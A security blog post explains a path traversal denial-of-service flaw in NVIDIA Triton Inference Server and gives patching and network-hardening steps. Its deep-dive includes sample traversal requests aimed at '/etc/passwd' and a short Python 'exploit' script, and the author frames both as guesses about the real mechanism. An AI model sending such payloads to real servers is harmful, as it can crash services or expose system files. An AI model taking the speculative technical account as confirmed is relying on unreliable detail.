Security ResearchMay 21, 20266 min read

Path Traversal in NVIDIA Triton Inference Server: Your ML Pipeline's Soft Underbelly

CVE-2026-24208 exposes a path traversal vulnerability in NVIDIA Triton Inference Server that enables denial of service. Here's how it works, who's affected, and what to do right now.

nvidia triton-inference-server path-traversal cve ml-security denial-of-service

Your ML Inference Server Is One Bad Path Away from Going Down

If you're running NVIDIA Triton Inference Server in production — and given how ubiquitous it's become in ML serving pipelines, there's a good chance you are — you need to pay attention to CVE-2026-24208. It's a path traversal vulnerability that lets an attacker trigger denial of service against your inference infrastructure.

A CVSS 5.3 (Medium) might not set off alarm bells in your vulnerability management dashboard. But here's the thing: Triton often sits at the heart of real-time ML serving. A DoS against your inference server doesn't just mean one service goes down — it means every downstream application waiting on model predictions stalls, times out, or fails ungracefully. That's your recommendation engine, your fraud detection, your content moderation — all of it.

I've seen too many teams treat ML infrastructure as "internal only" and skip hardening. This CVE is a reminder that inference servers are attack surface, full stop.

What Happened

NVIDIA disclosed CVE-2026-24208, a path traversal vulnerability in Triton Inference Server. The core issue is straightforward: an attacker can craft requests that traverse the filesystem path beyond intended directories. In this case, the successful exploitation leads to denial of service rather than information disclosure or code execution.

The vulnerability sits in how Triton handles certain path inputs — likely in model repository access or the HTTP/gRPC API endpoints that accept file path parameters. When an attacker supplies a path containing traversal sequences, the server fails to properly sanitize or reject the input, leading to resource exhaustion or a crash.

NVIDIA has assigned this a CVSS base score of 5.3 (Medium) with a network attack vector, meaning no authentication is required and it can be exploited remotely. The attack complexity is low, which means this isn't some theoretical race condition — it's reliably exploitable.

The affected component is NVIDIA Triton Inference Server. Check NVIDIA's security bulletin for the exact version ranges, but if you're running any recent version that hasn't been explicitly patched, assume you're vulnerable.

Technical Deep-Dive: How Path Traversal Hits an Inference Server

Path traversal is one of the oldest vulnerability classes in the book, but it keeps showing up because developers trust input they shouldn't. In Triton's case, the server exposes APIs for model management — loading, unloading, and querying models from a model repository.

Here's what a normal model loading request might look like:

http

POST /v2/repository/models/my_model/load HTTP/1.1
Host: triton-server:8000
Content-Type: application/json

{
  "parameters": {
    "model_repository": "/models"
  }
}

Now imagine an attacker manipulates the path input to include traversal sequences:

http

POST /v2/repository/models/..%2F..%2F..%2F..%2Fetc%2Fpasswd/load HTTP/1.1
Host: triton-server:8000
Content-Type: application/json

{}

Or through model repository path parameters:

python

import requests

# Exploit: path traversal via model name or repository path
target = "http://triton-server:8000"

# Attempt traversal through model repository API
payload = {
    "parameters": {
        "model_repository": "/models/../../../../proc/self/fd/0"
    }
}

# This could cause the server to attempt operations on unexpected paths,
# leading to resource exhaustion or crash
response = requests.post(f"{target}/v2/repository/index", json=payload)
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

The root cause is insufficient input validation on path parameters. When Triton receives a path containing ../ sequences (or URL-encoded equivalents like ..%2F), it resolves them against the filesystem without first verifying the resolved path stays within the intended model repository directory. The server then attempts to perform file operations on invalid or sensitive paths, which triggers an unhandled error condition, resource lock, or outright crash.

What makes this a DoS rather than an information disclosure is likely that the traversal hits a code path that causes the server process to enter a bad state — maybe it tries to memory-map a device file, or it deadlocks trying to acquire a lock on a path that doesn't behave like a regular file. The result: your inference server stops responding.

Impact: Who Should Be Worried

Triton Inference Server is everywhere in production ML. It's the default serving solution for teams using NVIDIA GPUs, it's baked into cloud ML platforms, and it handles multi-framework model serving (TensorFlow, PyTorch, ONNX, TensorRT) behind a unified API. If you're doing ML at scale on NVIDIA hardware, you're probably running Triton.

The blast radius of a DoS against Triton is proportional to how central it is in your architecture. In many deployments, Triton is the single point of inference — every prediction request flows through it. Take it down and you've effectively disabled your ML capabilities. For services that depend on real-time inference (fraud detection, autonomous systems, content filtering), this isn't just an inconvenience — it's a business-critical failure.

The network attack vector with no authentication requirement is the concerning part. If your Triton instance is exposed — even just to your internal network — any compromised service or malicious insider can trigger this. And in Kubernetes environments where network policies are often permissive by default, that's a lot of potential attackers.

What to Do Right Now

First, check your Triton version and cross-reference with NVIDIA's security bulletin:

bash

# Check running Triton version
docker exec <triton-container> tritonserver --version

# Or if running as a service
curl http://triton-server:8000/v2/health/ready
curl http://triton-server:8000/v2 | jq '.version'

Upgrade immediately to the patched version specified in NVIDIA's advisory. If you're pulling from NGC (NVIDIA GPU Cloud), update your container tag:

yaml

# In your deployment manifest, pin to the patched version
spec:
  containers:
    - name: triton
      image: nvcr.io/nvidia/tritonserver:<patched-version>-py3

If you can't upgrade immediately, apply network-level mitigations:

yaml

# Kubernetes NetworkPolicy: restrict who can talk to Triton
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: triton-ingress-restrict
spec:
  podSelector:
    matchLabels:
      app: triton-inference-server
  policyTypes:
    - Ingress
  ingress:
    - from:
        - podSelector:
            matchLabels:
              role: ml-client
      ports:
        - protocol: TCP
          port: 8000
        - protocol: TCP
          port: 8001

Warning: Do not expose Triton's model management API (typically port 8000 HTTP or 8001 gRPC) to untrusted networks. If you need the model control API for dynamic loading, put it behind an authenticated reverse proxy.

Additionally, consider disabling the model control mode if you don't need dynamic model loading in production:

bash

# Start Triton with explicit model control disabled
tritonserver --model-repository=/models --model-control-mode=none

With --model-control-mode=none, the server loads all models at startup and doesn't accept load/unload requests via the API, which significantly reduces the attack surface for path traversal.

The Bigger Picture

This vulnerability is a textbook example of why ML infrastructure needs the same security rigor as any other production service. I keep seeing teams deploy Triton (and similar inference servers) with default configs, wide-open network access, and zero input validation at the API gateway level — because "it's just internal" or "it's just serving models."

Path traversal in 2026 shouldn't be a thing, but it is, because complex systems have complex input surfaces and developers don't always trace every path parameter through to its filesystem resolution. The lesson here isn't just "patch this CVE" — it's "treat your inference server like the critical, internet-adjacent service it effectively is." Lock down network access, disable APIs you don't need, and monitor for anomalous request patterns. Your ML pipeline is only as resilient as its weakest serving component.